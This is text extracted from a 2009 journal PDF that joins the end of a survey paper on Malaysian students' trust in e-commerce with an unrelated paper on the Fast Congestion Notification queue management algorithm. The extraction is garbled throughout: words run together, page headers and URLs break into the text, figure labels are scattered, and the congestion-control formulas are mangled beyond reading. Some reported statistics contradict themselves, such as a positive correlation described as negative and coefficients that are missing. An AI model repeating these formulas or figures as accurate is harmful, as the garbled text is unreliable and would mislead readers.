In essence, numerous research papers have been publishedduring the last few years on various issues pertaining to e-commerce. Since this paper deals with building consumers’trust in e-commerce transaction, it only cites literature relevantto the issue. The present research is intended to fill-up the gapon Malaysian consumers regarding identification of factors
that help build their trust in greater e-commerce participation.
III. RESEARCH DESIGN AND METHOD
The main objective of this study is to identify the factorsthat contribute to the consumers’ willingness to engage in e-commerce transactions, and further study the relationshipbetween those factors. Therefore, this study will focus on thefollowing sub-objectives:
• To study whether or not consumers’ perceived securityand privacy of online transaction significantly affecttheir confidence to adopt e-commerce.
• To identify the factors of trust with web vendors to
engage in transactions involving money and personaldata.
• To study the role of institutional trust and economicincentive in consumers’ perceived risk in the context of e-commerce.
The factors considered to be influencing consumers’confidence to adopt e-commerce are grouped into four maincategories: consumers’ attitudes towards secure onlinetransaction processing systems, privacy of consumers’personal data, trust and reliability of online vendors, andconsumers’ perceived risk in e-commerce transactions. Themodel to be tested is shown in Figure 1.
H1+
H3+ H7-
Perceived
Informationsecurity
H2+
Consumers’
Trust in E-
Commerce Transaction Perceived
Risk
H5- H6-
Perceived
Information
i
H4+Trustworthinessof Web Vendor
Institutionaltrust
Economic
incentives
Figure 1. Research Model.
Specifically, the following hypotheses are to be tested:
H1: A consumer’s perceived security of online transactionpositively contributes to his/her trust in online transaction.
H2: A consumer’s perceived privacy of online transactionpositively contributes to his/her trust in online transaction.
154 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 161/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
H3: The influence of a consumer’s perceived privacy of online transaction on trust is mediated by perceived security.
H4: A consumer’s trust in online transaction is positivelyrelated with the trustworthiness of Web vendor.
H5: The increase in institutional trust reduces consumers’perceived risk in online transaction.
H6: The increase in economic incentives reduces consumers’perceived risk in online transaction.
H7: A consumer’s trust in online transaction is negativelyassociated with perceived risk in online transaction.
A survey instrument in the form of questionnaire wasdeveloped that consisted of three sections. Section 1 consistedof questions to collect respondents’ personal information (i.e.,gender, age, race, etc). Section 2 consisted of questionscovering some of the variables related to online purchase andadoption of electronic commerce. Specifically, the questionswere designed to collect information on frequency of internetuse, frequency of online purchases, intention to continueonline purchasing, etc. Section 3 consisted of questionscovering some of the variables related to factors affecting e-commerce security, privacy, and trust as well as risk perceptions. Questions in this section collected informationrelated to attitudes towards secure online transactionprocessing system, privacy of personal data, trustworthiness of Web vendors, and consumers’ perceived risk. All the variablesin this section employed Likert scale with endpoints rangingfrom 1 (strongly disagree) to 5 (strongly agree).
Before sending the questionnaires to the mass, it was preand pilot tested through a series of informal interviews withfaculty and doctoral students to ensure that they were properlyoperationalized. The items measures were suitably modified oradapted from extant literature. Based on pilot study with 25master and doctoral students for comprehensiveness, clarity
and appropriateness, 5 items for perceived security, 6 items forperceived privacy, 5 items for trustworthiness of Web vendors,3 items for consumers’ perceived risk, 2 items for economicincentive, 2 items for institutional trust and 2 items forconsumers’ trust were incorporated into the study instrument.In this survey, the target group of respondents were theinternet savvy students. 85 full-time final year undergraduatestudents (50.6% males and 49.4% females) from two localuniversities are participated in this study. The majority of therespondents (about 98.8%) are age between 20 to 30 whileremaining about 1.2% is age between 31 to 40. In term of races, about 57.6% are Malay while about 18.8% are Chineseand about 15.3% are Indian.
IV. DATA ANALYSIS
Out of the 85 respondents, almost all the respondents(about 96.5%) report that they frequently use the internetwhile the remaining 3.5% seldom use the internet. Therespondents did not have experience in online purchases andthey were asked about the possibility of their willingness tomake online purchases in the near future. About 49.4% are notwilling to purchase in the near future and about 8.3% arewilling to make online purchases in future. Furthermore, the
respondents who are not willing to purchase online in the nearfuture were asked about the reason(s) for that. The majorreason (35.5%) was cited to be the concern on security andprivacy of their personal data, followed by lack of interaction(about 27.1%) and cannot feel product (about 22.4%). All therespondents were also asked about their opinion on credit cardsecurity for online purchases. The majority of the respondents(about 54.1%) believe that the use of credit card for online
purchases is not safe, while about 11.8% believe somewhatsafe. About 8.2% of the respondents are indifferent on onlinecredit card security and the remaining (about 24.7%)respondents are not sure about this.
A. Descriptive Analysis
1) Information security concerns: Regarding online
information security concerns, only 10.6% of the respondents
agree that they would feel totally safe providing sensitive
information about themselves over the Web while majority
(about 57.7%) of the respondents do not believe this, and
about 31.8% of the respondents remained neutral on this
question. On the online payment, about 22.4% of the
respondents agree that the payment information they enteronline is safe and accessible only by the intended persons
while majority (about 41.1%) of the respondents do not
believe this. The remaining 36.5% of the respondents
remained indifferent to the question. On the integrity of the
online transactions, only 11.8% of the respondents believe that
the information they enter online is not altered in transit while
33.0% of the respondents do not believe this. The remaining
majority (about 55.3%) of the respondents remained neutral on
this question. About 17.6% of the respondents agree that they
would not hesitate to make purchase from the Web because of
security issues of sensitive information and about 40.0% of the
respondents do not agree this. The remaining 42.4% of the
respondents remained indifferent to the question. Overall,about 31.8% of the respondents believe that there is an
adequate control in place to ensure security of personal data
transmitted during online transaction processing while about
30.6% of the respondents do not believe this, and about 37.6%
of the respondents remained neutral on this question.
Feel safeproviding info
over Web
Accessible onlyby intended
recipient
Info is notaltered in transit
Not hesitate topurchase for
security issues
Adequatecontrol to
ensure security
2.3
2.4
2.5
2.6
2.7
2.8
2.9
3
M e a n
Information Security Concerns
Figure 2. Mean of Information Security Concerns.
155 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 162/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
2) Information privacy concerns: Regarding the
information misused, about 36.5% of the respondents believe
that their personal information would not be misused when
transacting with online companies and about 23.5% of the
respondents do not believe this. The remaining 40.0% of the
respondents remained neutral on the question. Regarding the
control over information, about 42.3% of the respondents
believe that they have control over how the information they
provide will be used by online companies while about 24.7%
of the respondents do not believe this. The remaining 32.9% of
the respondents remained indifferent to the question.
Moreover, about 31.8% of the respondents believe that they
can later verify the information they provide during a
transaction with online companies while about 24.7% of the
respondents do not believe this. The remaining 43.5% of the
respondents remained neutral on the question. In addition,
only 25.9% of the respondents believe that online companies
will not reveal their sensitive information without their
consent while about 30.6% of the respondents do not believe
this, and majority (about 43.5%) of the respondents remained
neutral on this question. Regarding the effective mechanism,about 35.3% of the respondents believe that there is an
effective mechanism to address any violation of the sensitive
information they provide to online companies while about
20.0% of the respondents do not believe this. The remaining
majority (about 44.7%) of the respondents remained
indifferent to the question. Overall, about 35.3% of the
respondents believe that there is an adequate control in place
to protect the privacy of personal information within online
companies while about 18.8% of the respondents do not
believe this, and majority (about 45.9%) of the respondents
remained indifferent to this question.
Info wouldnot be
misused
Control overhow info will
be used
Later verifyinfo
Companieswill not
reveal info
Effectivemechanismto address
violation
Adequatecontrol toensureprivacy
2.85
2.9
2.95
3
3.05
3.1
3.15
M e a n
Information Privacy Concerns
Figure 3. Mean of Information Privacy Concerns.
3) Trustworthiness of Web Vendors: Regarding trust
beliefs of Web vendors, about 36.5% of the respondents
believe that online companies will act with high business
standards while about 24.7% of the respondents do not believe
this. The remaining 38.8% of the respondents remained
indifferent to the question. On the skills and expertise,
majority (about 48.2%) of the respondents believe that online
companies have the skills and expertise to perform
transactions in an expected manner and about 22.3% of the
respondents do not believe this. The remaining 29.4% of the
respondents remained neutral on the question. Regarding
whether online companies are dependable, about 30.6% of the
respondents believe that online companies are dependable
while about 24.7% of the respondents do not believe this. The
remaining 44.7% of the respondents remained indifferent to
the question. Moreover, about 29.4% of the respondents
believe that online companies do not have ill intensions about
any of their consumers while about 31.7% of the respondents
do not believe this. The remaining 38.8% of the respondents
remained indifferent to the question. Overall, only 22.4% of
the respondents believe that online companies are trustworthy
while about 25.9% of the respondents do not believe this, and
majority (about 51.8%) of the respondents remained neutral on
this question.
Companies willact with high
businessstandards
Companieshave skills and
expertise
Companies aredependable
Do not have illintension about
consumers
Companies aretrustworthy
2.85
2.9
2.95
3
3.05
3.1
3.15
3.2
3.25
M e a n
Trustworthiness of Web Vendors
Figure 4. Mean of Trustworthiness of Web Vendors.
4) Risk perception: Regarding risk perception, majority
(about 48.3%) of the respondents believe that providing credit
card information over the Web is unsafe while only 18.8% of
the respondents do not believe this. The remaining 32.9% of
the respondents remained indifferent to the question. In
addition, majority (about 54.1%) of the respondents believe
that it would be risky to give personal information to online
companies while about 17.7% of the respondents do not
believe this. The remaining 28.2% of the respondents
remained indifferent to the question. Furthermore, majority
(about 51.7%) of the respondents agree that there would be too
much uncertainty associated with providing personal
information to online companies and about 18.8% of the
respondents do not agree on this. The remaining 29.4% of the
respondents remained neutral on this question.
Credit card info over Webis unsafe
Risky to give info Uncertainty for providinginfo
3.44
3.46
3.48
3.5
3.52
M e a n
Risk Perception
Figure 5. Mean of Risk Perception.
156 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 163/215
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 164/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
Most items loaded onto the extracted factors except fromthe some items that were conceptualized to measure theinformation security concerns, information privacy concernsand trust beliefs of web vendors. Item on adequate control toensure security fairly loaded onto the factor of trust beliefs of web vendors, while the item on companies do not have illintention about consumers slightly loaded onto the informationsecurity concerns factor. However, items on later verify info
and effective mechanism to address violation of theinformation privacy concerns factor fairly loaded onto factorone (trust beliefs of web vendors). Also item on companies aredependable of the trust beliefs of web vendors factor loadedonto factor three. The tree items, namely, feel safe providinginformation over Web, information would not be misused, andcompanies are trustworthy had factor loading lower than 0.50.
D. Hypothesis Testing
Pearson correlation coefficients were computed in order totest the relationships between each factor and consumers’ trustin e-commerce transactions.
H1: A consumer’s perceived security of online transaction
positively contributes to his/her trust in online transaction.
The correlation coefficient between consumers’ attitudetowards secured online transaction and their confidence toadopt e-commerce was found to be with p = 0.545. Therefore,the research hypothesis is not accepted.
H2: A consumer’s perceived privacy of online transaction positively contributes to his/her trust in online transaction.
The results of the study show that perceived privacynegatively affects the consumer’s confidence to adopt e-commerce. The relationship is observed to be r=0.002 with p =0.986. Therefore, we reject the research hypothesis.
H3: The influence of a consumer’s perceived privacy of
online transaction on trust is mediated by perceived security.
The results of the study show that consumer’s perceivedprivacy of online transaction on trust is mediated by perceivedsecurity (r = 0.424). The relationship is observed to bestatistically significant with significance level less than 0.01 (p= 0.000). Therefore, we accept the research hypothesis.
H4: A consumer’s trust in online transaction is positivelyrelated with the trustworthiness of Web vendor.
The correlation coefficient between the trustworthiness of Web vendor and consumers’ confidence to adopt e-commercewas found to be 0.218 with p = 0.045. Therefore, the researchhypothesis is accepted.
H5: The increase in institutional trust reduces consumers’ perceived risk in online transaction.
We found that the increase in institutional trust does notreduce a consumers’ perceived risk in online transaction. Therelationship is observed to be r = 0.148 with p = 0.176.Therefore, we reject the research hypothesis.
H6: The increase in economic incentives reducesconsumers’ perceived risk in online transaction.
We also found that the increase in economic incentivesdoes not reduce a consumers’ perceived risk in onlinetransaction. The relationship is observed to be with p = 0.484.Therefore, we reject the research hypothesis.
H7: A consumer’s trust in online transaction is negativelyassociated with perceived risk in online transaction.
The results of the study show that a consumer’s trust in
online transaction is negatively associated with perceived risk in online transaction. (r = 0.388). The relationship is observedto be statistically significant with significance level less than0.01 (p = 0.000). Therefore, we accept the research hypothesis.
V. MANAGERIAL IMPLICATIONS
The present study confirms that while consumers’perceived security directly acts upon trust in electroniccommerce transactions, consumers’ perceived privacy’s effecton trust is mediated by perceived security. Thoseorganizations that are involved in e-commerce as well as willbe involved in e-commerce are expected that to act with highbusiness standards and to have the skills and expertise to
perform transactions in an expected manner. In addition,organizations should implement effective mechanism toaddress any violation of the consumers’ sensitive data byplacing adequate control to ensure security of personal data.
Despite the fact that all Web vendors today employ boththe fair information practices and security informationpractices in their online transactions, consumers do not fullyunderstand as to how the actions undertaken by Web vendorsease their risk. This may be due to a significant difference inthe public perceptions and expert assessment of technologyrelated risks. In order to enhance Web vendors’ reputation,organizations should offer education and awareness programson the efficiency of the protection mechanisms for sharingconsumers’ personal data online.
VI. LIMITATIONS OF THE STUDY
The study has several limitations that affect the reliabilityand validity of the findings. The study did not take intoaccount gender biases, cultural biases, income and otherdemographic variables with the research hypotheses. Further,only selected respondents participated in the study andtherefore a self-selection bias might have affected the findingsof this study and it may also limit the generalizability of thefindings. Since sampling was based on convenience sample of students, there are chances that the responses provided mightnot be the true reflection of the population in general and thefindings may not represent Malaysian consumers as a whole;
therefore, any generalization of the findings may not be 100%reliable. The model may have excluded other possible factorsinfluencing the consumers’ trust in e-commerce transactions(i.e., the study did not consider other beliefs, such as perceivedusefulness and perceived ease of use).
Future studies can also link other demographic variables of consumers as well as Web vendors’ reputation, site’susefulness and ease of use. These dimensions may provideinteresting recommendations on the difference in theconsumers’ trust building mechanisms to be adopted. Further,
158 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 165/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
future studies can also differentiate between the perceptions of consumers who have not transacted online with theperceptions of consumers who have transacted online.
VII. CONCLUSIONS
This study concludes that while trustworthiness of Webvendors is a critical factor in explaining consumers’ trust toadopt e-commerce, it is important to pay attention to theconsumers’ risk concern on e-commerce transactions. Thoughin previous researches, security and privacy appear to be thetop main concerns for consumers’ trust in e-commerceadoption, the empirical results indicate that there is a poorcorrelation between perceived security and perceived privacywith consumers’ trust. This may be because consumers getused to the Internet and to the techniques that can be used toprotect themselves online, the security and privacy arebecoming less sensitive matters over as time. However, theconstruct of perceived privacy manifests itself primarilythrough perceived security. As trustworthiness of WebVendors lies at the heart of enduring B2C e-commercerelationship, web-based organizations need to find ways of improving consumers’ perception of their trustworthiness inorder to utilize fully the prospective of e-commerce.
REFERENCES
[1] Krishnan, G., “Internet marketing exposure in Malaysia,”http://www.gobalakrishnan.com/2006/12/malaysia-internet-marketing/ ,2006.
[2] Ahuja, M., Gupta, B. and Raman, P., “An Empirical investigation of online consumer purchasing behavior,” Communications of the ACM,vol. 46, no. 12, pp. 145-151, 2003.
[3] Basu, A. and Muylle, S., “Authentication in e-commerce,”Communications of the ACM, vol. 46, no. 12, pp. 159-166, 2003.
[4] Bingi, P., Mir, A. and Khamalah, J., “The challenges facing global e-commerce,” Information System Management, vol. 17, no. 4, pp.26-34,2000.
[5] Salam, A.F., Rao, H.R. and Pegels, C.C., “Consumer-perceived risk in e-commerce transactions”, Communications of the ACM , vol. 46, no. 12,pp. 325-331, 2003.
[6] Ahmed, M., Hussein, R., Minakhatun, R. and Islam, R., “Buildingconsumers’ confidence in adopting e-commerce: a Malaysian case,” Int.J. Business and Systems Research, vol. 1, no. 2, pp.236–255, 2007.
[7] Dauda, Y., Santhapparaj, AS., Asirvatham, D. and Raman, M., “TheImpact of E-Commerce Security, and National Environment onConsumer adoption of Internet Banking in Malaysia and Singapore,”
Journal of Internet Banking and Commerce , vol. 12, no. 2, Aug 2007.
[8] Khatibi, A. Thyagarajan, V. and Scetharaman, A., “E-commerce inMalaysia: Perceived benefits and barriers”, Vikalpa, Vol. 28, no.3,pp. 77-82, 2003.
[9] Economist Intelligence Unit, “Overview of e-commerce in Malaysia,”The Economist ,http://globaltechforum.eiu.com/index.asp?layout=printer_friendly&doc_id =8706, 13 June 2006.
[10] IDC Malaysia, “IDC Reports 70% Growth in Malaysia eCommerceSpending in 2006,” http://www.idc.com.my/PressFiles/IDC%20Malaysia%20-%20eCommerce.asp, 24 January, 2007
[11] Jawahitha, S., “Consumer Protection in E-Commerce: Analysingthe Statutes in Malaysia,” The Journal of American Academy of
Business, Cambridge.Vol. 4, no.1/2, pp. 55-63, 2004.
[12] Azmi, I.M., “E-commerce and privacy issues: an analysis of the personal
data protection bill,” International Review of Law Computers andTechnology, vol. 16, no. 3, pp.317–330, 2002.
AUTHORS PROFILE
Yi Yi Thaw (rashidah_minakhatun@utp.edu.my) is a PhD student at theDepartment of Computer and Information Sciences, Universiti TeknologiPETRONAS, 31750, Tronoh, Perak, Malaysia.
Dr. Ahmad Kamil Mahmood (kamilmh@petronas.com.my) is an AssociateProfessor at the Department of Computer and Information Sciences, UniversitiTeknologi PETRONAS, 31750, Tronoh, Perak, Malaysia.
Dr. P.Dhanapal Durai Dominic (dhanapal_d@petronas.com.my) is a SeniorLecturer at the Department of Computer and Information Sciences, UniversitiTeknologi PETRONAS, 31750, Tronoh, Perak, Malaysia.
159 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 166/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009
The Uniformization Process of the Fast Congestion
Notification (FN)
Mohammed M. KadhumInterNetWorks Research Group
College of Arts and Sciences
Universiti Utara Malaysia
06010 UUM Sintok, Malaysia
kadhum@uum.edu.my
Suhaidi HassanInterNetWorks Research Group
College of Arts and Sciences
Universiti Utara Malaysia
06010 UUM Sintok, Malaysia
suhaidi@uum.edu.my
Abstract — Fast Congestion Notification (FN) is one of the
proactive queue management mechanisms that practices
congestion avoidance to help avoid the beginning of congestion by
marking/dropping packets before the router’s queue gets full;
and exercises congestion control, when congestion avoidance fails,
by increasing the rate of packet marking/dropping. Technically,
FN avoids the queue overflows by controlling the instantaneousqueue size below the optimal queue size, and control congestion
by keeping the average arrival rate close to the outgoing link
capacity. Upon arrival of each packet, FN uses the instantaneous
queue size and the average arrival rate to calculate the packet
marking/dropping probability. FN marks/drops packets at fairly
regular intervals to avoid long intermarking intervals and
clustered packet marks/drops. Too many marked/dropped
packets close together can cause global synchronization, and also
too long packet intermarking times between marked/dropped
packets can cause large queue sizes and congestion. This paper
shows how FN controls the queue size, avoids congestion, and
reduces global synchronization by uniformizing marked/dropped
packet intervals.
Keywords-Internet Congestion; Active Queue Management (AQM); Random Early Detection (RED); Fast Congestion Notification(FN); Packet Mark/Drop Probability
I. INTRODUCTION
Internet gateways’ queues are used to accommodate
incoming packet and to allow the gateway enough time for
packet transmission. When the arriving packet rate is higher
than the gateway’s outgoing link capacity, the queue size will
increase, until the gateway buffer becomes full. When the
buffer is full, the newly arriving packet will be dropped.
In the current Internet, the TCP transport protocol detects
congestion only after a packet has been marked/dropped at thegateway. However, it would clearly be undesirable to have
large queues that were full much of the time; this would
significantly increase the average delay in the network. Hence,
with increasingly high-speed networks, it is important to have
mechanisms that keep throughput high but average queue sizes
low [1].
Active queue management (AQM) mechanisms mark/drop
packets before the gateway’s buffer is full. These mechanisms
operate by maintaining one or more mark/drop probabilities,
and probabilistically dropping/marking packets even when the
queue is short.
II. ACTIVE QUEUE MANAGEMENT (AQM)
Active queue management policies, such as Random EarlyDetection (RED), are expected to eliminate global
synchronization that introduced by reactive queue
management policies and improve Quality of Service (QoS) of
the networks. The promised advantages of AQM are increase
in throughput, reduce the delay, high link utilizations, and
avoid lock-out. AQM provides preventive measures to manage
the router queue to overcome the problems associated with
passive queue management policies. AQM has the following
attributes:
Performing a preventive random packet mark/drop beforethe queue is full.
The probability of the preventive packet mark/drop isproportional to congestion levels.
Preventive packet mark/drop provides implicit feedback
method to notify the traffic senders of the congestion onset
[2]. As a reaction, senders reduce their transmission rate to
moderate the congestion level. Arriving packets from the
senders are marked/dropped randomly, which prevents senders
from backing off at the same time and thereby eliminate global
synchronization [2].
Different packet marking/dropping strategies have different
impacts on the gateway performance, including packet delays,
number of dropped packets, and link utilizations. Generally,
with a given AQM scheme, if a gateway drops packets more
aggressively, less packets will be admitted and go through the
gateway, hence the outgoing link’s utilization may be lower;
but in return, the admitted packets will experience smaller
delays. Conversely, if under an AQM scheme which drops
packets less aggressively, the admitted packets may be queued
up at the gateway, hence the admitted packets will experience
larger delays. But in this case the outgoing link’s utilization
may be higher, since more packets are admitted and
transmitted by the gateway [3].
160 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 167/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009 A. Random Early Detection (RED)
RED [1] is one of AQM mechanisms that requires the user
to specify five parameters: the maximum buffer size or queue
limit (QL), the minimum (minth) and maximum (maxth)
thresholds of the "RED region", the maximum dropping
probability (max p), and the weight factor used to calculate the
average queue size (wq). QL can be defined in terms of packets
or bytes. A RED gateway uses early packet dropping in an
attempt to control the congestion level, limit queuing delays,
and avoid buffer overflows. Early packet dropping starts when
the average queue size exceeds minth. RED was specifically
designed to use the average queue size (avg), instead of the
current queue size, as a measure of incipient congestion,
because the latter proves to be rather intolerant of packet
bursts. If the average queue size does not exceed minth, a RED
gateway will not drop any packet. avg is calculated as an
exponentially weighted moving average using the following
formula:
× q+ w) × avg- w= (avg qi-qi 11 (1)
where the weight wq is commonly set to 0.002 , and q is theinstantaneous queue size. This weighted moving average
captures the notion of long-lived congestion better than the
instantaneous queue size [4]. Had the instantaneous queue size
been used as the metric to determine whether the router is
congested, short-lived traffic spikes would lead to early packet
drops. So a rather underutilized router that receives a burst of
packets can be deemed "congested" if one uses the
instantaneous queue size. The average queue size, on the other
hand, acts as a low pass filter that allows spikes to go through
the router without forcing any packet drops (unless, of course,
the burst is larger than the queue limit). The user can configure
wq and minth so that a RED router does not allow short-lived
congestion to continue uninterrupted for more than apredetermined amount of time. This functionality allows RED
to maintain high throughput and keep per-packet delays low.
RED uses randomization to decide which packet to drop
and, consequently, which connection will be notified to slow
down. This is accomplished using a probability pa, which is
calculated according to the following formulae:
pb = max p × (avg - minth) / (maxth - minth) (2)
and
pa = pb / (1 - count × pb) (3)
where maxp is a user-defined parameter, usually set to 2% or
10% , and count is the number of packets since the last packet
mark/drop. count is used so that consecutive marks/drops are
spaced out over time. Notice that pb varies linearly between 0
and max p, while pa, i.e., the actual packet marking/dropping
probability increases with count [5]. Originally, maxth was
defined as the upper threshold; when the average queue size
exceeds this limit, all packets have to be dropped (Figure
1(a)). Later on, a gentle version of RED [6] was proposed as a
modification to the dropping algorithm, under which packets
are dropped with a linearly increasing probability
until avg exceeds 2×maxth; after that all packets are dropped
(Figure 1(b)). Although maxth can be set to any value, a rule of
thumb is to set it to three times minth, and less than QL [4].
Figure 1. The packet dropping probability ( pb) in RED as a function of the
average queue size (max p = 10%)
By marking/dropping packets before the buffer overflows,
RED attempts to notify some connections of incipient
congestion. The responsive ones will limit their sending ratesand eventually the network load will decrease. The
unresponsive connections will not slow down, but will
continue at the same pace or even increase their sending rates.
In this case, the unresponsive flows will have more packets
reaching the router, effectively providing more candidates for
dropping than responsive ones.
B. Fast Congestion Notification (FN)
The Fast Congestion Notification (FN) [7] queue
management algorithm randomly marks (if ECN) / drops (if
non-ECN) the arriving packets before the buffer overflows, to
effectively control the:
Instantaneous queue length below the optimal queuelength to reduce the queuing delay and avoid the bufferoverflows.
Average traffic arrival rate of the queue in theproximity of the departing link capacity to enable thecongestion and queue length control.
FN integrates the instantaneous queue length and the
average arriva1 rate of queue to compute the mark/drop
161 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 168/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009probability of the packet upon each arriving packet. The use of
the instantaneous queue length in conjunction with the average
queue speed (average arrival rate) can provide superior control
decision criteria for an active queue management scheme [8].
The FN linear mark/drop probability function [9] is derived
based on the assumption that the arrival traffic process
remains unchanged over the control time constant period of
length (T ) seconds. In other words, it is supposed thatimmediately following the packet's arrival, the traffic
continues to arrive at the fixed rate of ( R) bits/sec, the
estimated average arrival rate to the buffer computed upon the
packet's arrival, for the period of the control time constant.
The buffer has a capacity of (C ) bits and is served by an
outgoing link at a fixed rate of ( µ) bits/sec. The packet
mark/drop probability (P), is computed for, and applied to,
every incoming packet, based on the above assumptions, with
the goal of driving the instantaneous (current) queue length
(Qcur ) to some desired optimal level (Qopt ) over the control
time constant period (T ). These are shown in figure 2. The FN
mark/drop probability, P, is calculated by
T i R
cur Qopt QT i Ri
P
.
)()).(()(
(4)
Figure 2. FN Gateway Buffer
III. UNIFORMIZATION OF PACKET MARKS/DROPS
An attractive property of RED resulting from using the
count variable is that the number of accepted packets
between two packet marks/drops is uniformly distributed
[1]. By having a uniform distribution, packet marks/drops are
not clustered, avoiding again possible synchronization of
TCP sources. Although quantitative benefits of having a
uniform distribution were not, at the best of our knowledge,
reported in the literature it is commonly admitted that having
light-tailed distributions (such as the uniform distribution)
gives better performance in terms of efficiency and fairness
[5].
Same as RED, FN marks/drops packets at fairly regularintervals. FN uniformization technique enforces packet
marks/drops at evenly spaced intervals to avoid long periods
of time, where no packets are marked or dropped and clustered
packet marks/drops, under the steady-state conditions at
gateway. Very long packet marking/dropping times can
contribute to large queue sizes and congestion. Multiple
successive packet marks/drops can result in global
synchronization problem.
To compute the initial marking/dropping probability, FN
uses the average traffic arrival rate and the instantaneous
queue size by
(( ). ) ( )
.ini
R T Q Qcur opt P
R T
(5)
The initial marking/dropping probability is used alongwith the number of accepted packets between two packet
marks/drops (count ) by the uniformization function to
calculate the final packet marking/ dropping probability as
follows:
. 22 .1
iniini
ini fin
Pcount P
P count Potherwise
(6)
Figure 1. FN Uniformization Function -
2 .
ini
ini
PP fin
count P
Figure 3 shows that the FN uniformization function
increases the value of the initial marking/dropping
probability proportional to the number of the accepted
packets (count ) since the last marking/dropping. When count
increases, the final marking/dropping probability P fin will
rise until it finally reaches 1. This means that even if the
conditions at the gateway are such that P remains
comparatively constant, the uniformization technique directs
the marking/dropping probability towards 1, ensuring that
after some number of accepted packets, the
marking/dropping probability will reach 1, performing a
packet marking/dropping operation. This avoids long
intermarking intervals, which helps in controlling the gatewayqueue size effectively, and preventing congestion. From
Figure 3, it is noticeable that the larger the initial
marking/dropping probability, the smaller is the number of
accepted packets required to direct the marking/dropping
probability to 1 and hence, the less the delay before a
packet mark/drop operation is activated. This is logic
because a larger initial marking/dropping probability warns of
the onset of congestion in near future, and therefore the
162 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 169/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 & 2 , 2009uniformization process performs a packet mark/drop
immediately, and thus, the sources are notified about the
congestion early. In case count.P > 2, the final packet
mark/drop probability is set to 1. This is logic because 2-
count.P < 0 only happens when either the number of accepted
packets (count ) or the initial mark/drop probability P or both
are comparatively large values. A large value of count
signifies that a long period of time has passed since the last
packet was marked or dropped. A large value of P signifiesthe serious deficiency of resources at the gateway caused by
congestion. In both cases, it is required to perform a packet
mark/drop operation immediately. The expected packet
marking/dropping time examination ( E (T m)) is used to show
how uniformization process educes clustered packet
marks/drops. For a predetermined initial packet
marking/dropping probability Pini, if Pini is immediately
applied to the arriving packets, the packet marking/dropping
time (T m) defined as the number of accepted packets
between two successive marked/dropped packets, is
geometrically distributed with Pini for which
p(T m = n) = (1 - Pini)(n-1)
. Pini (7)
and E (T m) = 1/ Pini [1]. Nevertheless, if the final
marking/dropping probability P fin is applied to the arriving
packets, the packet marks/drops interval (T m) will be
uniformly distributed with
21,
20
ini
ini
Pn
P Potherwise
(8)
and E (T m) = (1/ Pini) + (1/2). Figure 4 shows the expected
packet marking/dropping intervals for the geometric
distribution and uniform distribution cases.
Figure 2. Expected Packet Marking/Dropping Times – Uniform Distribution: (1/ Pini) + (1/2), Geometric Distribution: 1/ Pini
From Figure 4, it is noticeable that both curves become
almost parallel as Pini goes toward 1. Figure 4 verifies that for
a predetermined marking/dropping probability Pini, the
expected packet marking/dropping time is smaller for the
geometrically distributed case compared to the uniform one.
The increase in the packet marking/dropping interval is
more significant for larger values of the marking/dropping
probability Pini. This indicates that the uniformization
procedure increases the small expected packet
marking/dropping times, as a result of large initial packet
marking/dropping probabilities, ensuring that clustered packet
marks/drops are minimized.
IV. CONCLUSION
This paper shows how FN uniformization process of packet
intermarking intervals ensures packet drops/marks at fairly
regular intervals. Avoidance of large intermarking intervals
can help in controlling congestion by sending rate congestion
notification signals to traffic sources in moderation on a
regular basis while avoiding small intermarking intervals can
help in minimizing clustered packet drops/marks and global
synchronization.
REFERENCES
[1] S. Floyd and V. Jacobson, "Random early detection gateways for
congestion avoidance," Networking, IEEE/ACM Transactions on,vol. 1, pp. 397-413, 1993.[2] S. Leonardo, P. Adriano, and M. Wagner, Jr., "Reactivity-based
Scheduling Approaches For Internet Services," in Proceedings of
the Fourth Latin American Web Congress: IEEE ComputerSociety, 2006.
[3] L. Xue and H. Wenbo, "Active queue management design using
discrete-event control," in Decision and Control, 2007 46th IEEE
Conference on, 2007, pp. 3806-3811.
[4] M. Christiansen, K. Jeffay, D. Ott, and F. D. Smith, "Tuning RED
for Web traffic," Networking, IEEE/ACM Transactions on, vol. 9,pp. 249-264, 2001.
[5] S. De Cnodder, O. Elloumi, and K. Pauwels, "RED behavior with
different packet sizes," in Computers and Communications, 2000.
Proceedings. ISCC 2000. Fifth IEEE Symposium on , 2000, pp.
793-799.
[6] S. Floyd, "Recommendation on using the ―gentle‖ variant of
RED," 2000, http://www.icir.org/floyd/red/gentle.html.[7] M. M. Kadhum and S. Hassan, "Fast Congestion Notification
mechanism for ECN-capable routers," in Information Technology,2008. ITSim 2008. International Symposium on , 2008, pp. 1-6.
[8] M. M. Kadhum and S. Hassan, "The Design Motivations and
Objectives for Fast Congestion Notification (FN)," in for theProceedings of the APAN Network Research Workshop Malaysia,
2009.
[9] M. M. Kadhum and S. Hassan, "A Linear Packet MarkingProbability Function for Fast Congestion Notification (FN),"
